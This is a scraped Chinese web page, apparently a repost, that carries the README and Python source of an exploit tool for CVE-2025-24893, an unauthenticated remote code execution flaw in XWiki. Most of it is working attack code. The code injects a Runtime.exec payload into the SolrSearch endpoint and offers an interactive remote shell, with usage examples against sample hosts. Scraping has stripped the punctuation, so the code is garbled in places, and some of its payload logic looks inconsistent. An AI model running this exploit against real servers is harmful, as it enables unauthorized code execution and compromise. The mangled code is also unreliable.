平湖网站改版厦门中科做网站总打电话来
2026/4/6 2:18:52 网站建设 项目流程
平湖网站改版,厦门中科做网站总打电话来,漯河网站建设 千弘网络,微信小程序开发公司十大排名CVE-2025-24893 - XWiki未授权RCE漏洞检测工具 #x1f4cb; 项目描述 这是一个针对CVE-2025-24893漏洞的检测与利用工具。CVE-2025-24893是一个影响XWiki平台的严重远程代码执行漏洞#xff0c;允许未经身份验证的攻击者在目标系统上执行任意代码。该漏洞源于SolrSearch宏中…CVE-2025-24893 - XWiki未授权RCE漏洞检测工具 项目描述这是一个针对CVE-2025-24893漏洞的检测与利用工具。CVE-2025-24893是一个影响XWiki平台的严重远程代码执行漏洞允许未经身份验证的攻击者在目标系统上执行任意代码。该漏洞源于SolrSearch宏中的Groovy代码不安全评估导致服务器端代码执行。⚠️ 重要声明本工具仅供授权的安全测试和教育目的使用。未经授权的使用是非法行为。✨ 功能特性漏洞检测自动检测目标XWiki实例是否存在CVE-2025-24893漏洞命令执行支持在漏洞存在时执行系统命令交互模式提供交互式shell界面进行多命令操作安全检测使用无害的命令进行初步漏洞验证多平台支持支持多种XWiki版本5.3-milestone2至15.10.1016.0.0-RC1至16.4.0 安装指南系统要求Python 3.xrequests库网络访问权限安装步骤确保系统已安装Python 3.x安装必要的依赖pipinstallrequests下载脚本文件gitclone https://github.com/B1ack4sh/Blackash-CVE-2025-24893.gitcdBlackash-CVE-2025-24893 使用说明基础用法# 1. 仅检测漏洞python3 cve-2025-24893.py http://your-lab-xwiki:8080# 2. 执行单条命令python3 cve-2025-24893.py http://target:8080whoami# 3. 进入交互模式python3 cve-2025-24893.py http://target:8080使用示例漏洞检测python3 cve-2025-24893.py http://192.168.1.100:8080/执行命令python3 cve-2025-24893.py http://192.168.1.100:8080/ls -la交互模式python3 cve-2025-24893.py http://192.168.1.100:8080/ RCE $whoamiRCE $idRCE $exit注意事项仅在拥有所有权或获得明确授权的目标上使用使用前确保了解相关法律法规建议在测试环境中验证功能 核心代码1. 漏洞检测函数defcheck_vulnerable(target): 检测目标XWiki实例是否存在CVE-2025-24893漏洞 Args: target: 目标URL Returns: bool: 如果存在漏洞返回True否则返回False urlf{target.rstrip(/)}/bin/get/Main/SolrSearch# 使用Python代码注入进行检测params{search:{{.__class__.__mro__[1].__subclasses__()[414](id, shellTrue, capture_outputTrue).communicate()}}}try:# 发送检测请求rrequests.get(url,paramsparams,timeout15,verifyFalse,allow_redirectsFalse)# 检查响应中是否包含命令执行结果ifr.status_code200and(uidinr.textorgidinr.text):print([] VULNERABLE! Command output detected:)print( r.text.strip().replace(\n,\n ))returnTrueelse:print([-] Not vulnerable or command didnt return output.)returnFalseexceptExceptionase:print(f[!] Request failed:{e})returnFalse2. 命令执行函数defexecute_command(target,command): 在存在漏洞的目标上执行系统命令 Args: target: 目标URL command: 要执行的系统命令 # Groovy RCE payload构造payloadf#set($ex$class.inspect(java.lang.Runtime).getRuntime().exec({command}))payload#set($out$ex.waitFor())#set($null$ex.getInputStream().close())# URL编码payloadencodedurllib.parse.quote(payload,safe)urlf{target.rstrip(/)}/bin/get/Main/SolrSearch?search{encoded}outputSyntaxplaintry:# 发送命令执行请求rrequests.get(url,timeout20,verifyFalse,allow_redirectsFalse)ifr.status_code200:print(f[] Command executed:{command})print(f Output:\n{r.text.strip()})else:print(f[-] HTTP{r.status_code}- No output or blocked)exceptExceptionase:print(f[!] Error:{e})3. 主程序入口if__name____main__:# 显示工具bannerbanner()# 检查命令行参数iflen(sys.argv)2:print(Usage: python3 cve-2025-24893.py http://xwiki-target.com [command])print(Example: python3 cve-2025-24893.py http://192.168.1.100:8080/ whoami)sys.exit(1)targetsys.argv[1]print(f[*] Target:{target})# 步骤1: 漏洞检测非破坏性ifnotcheck_vulnerable(target):print([*] Trying alternative detection...)# 回退检测方法执行无害的ping命令execute_command(target,ping -c 1 127.0.0.1)else:print([] Confirmed vulnerable!)# 步骤2: 交互模式或单命令执行iflen(sys.argv)3:cmd .join(sys.argv[2:])execute_command(target,cmd)else:print(\n[] Interactive shell mode (type exit to quit))whileTrue:try:cmdinput(RCE $ )ifcmd.lower()in[exit,quit]:breakifcmd.strip():execute_command(target,cmd)exceptKeyboardInterrupt:print(\nBye!)break4. Banner显示函数defbanner(): 显示工具的ASCII艺术banner和基本信息 print(r ██████╗ ██╗ █████╗ ██████╗ ██╗ ██╗ █████╗ ███████╗ ██╗ ██╗ ██╔══██╗ ██║ ██╔══██╗ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔════╝ ██║ ██║ ██████╔╝ ██║ ███████║ ██║ █████╔╝ ███████║ ███████╗ ███████║ ██╔══██╗ ██║ ██╔══██║ ██║ ██╔═██╗ ██╔══██║ ╚════██║ ██╔══██║ ██████╔╝ ███████╗ ██║ ██║ ╚██████╗ ██║ ██╗ ██║ ██║ ███████║ ██║ ██║ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝ CVE-2025-24893 Critical XWiki Remote Code Execution Vulnerability )print( Educational PoC - Only for authorized security testing!\n) 受影响版本❌ 受影响版本XWiki版本系列受影响范围5.x → 15.x5.3-milestone2 → 15.10.1016.x16.0.0-RC1 → 16.4.0✅ 已修复版本安全版本说明15.10.11LTS修复版本16.4.1稳定分支修复16.5.0-RC1开发分支修复 技术细节漏洞组件SolrSearch宏 → RSS渲染 → 用户控制文本的不安全评估根本原因❌ 用户输入的不正确清理❌ Groovy代码动态评估导致CWE-94 CWE-95代码生成/评估注入漏洞利用攻击者通过构造恶意搜索请求来滥用模板渲染功能从而在服务器端执行任意代码。该漏洞已被用于真实攻击中部署恶意软件如加密货币挖矿程序。6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAP/Jlw6EmeCYkkivuRs1AH更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询